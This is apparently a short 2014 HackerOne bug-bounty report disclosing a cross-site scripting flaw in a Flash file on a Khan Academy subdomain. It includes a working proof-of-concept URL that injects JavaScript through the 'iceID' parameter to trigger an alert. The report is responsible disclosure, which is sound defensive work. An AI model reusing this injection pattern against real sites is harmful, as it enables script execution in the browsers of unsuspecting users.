Khan Academy: XSS at http://smarthistory.khanacademy.org

2014-04-08T18:46:23
ID H1:6575
Type hackerone
Reporter prakharprasad
Modified 2014-04-09T04:33:45

Description

Hi,

There is a SWF-based XSS : http://smarthistory.khanacademy.org/assets/flash/cozimo.swf?iceID=\%22%29%29}catch%28e%29{alert%28%27XSS%27%29;}//

Opening the link would trigger JavaScript execution! Works in possibly any browser with Adobe Flash, i.e - Chrome, Firefox

Thanks!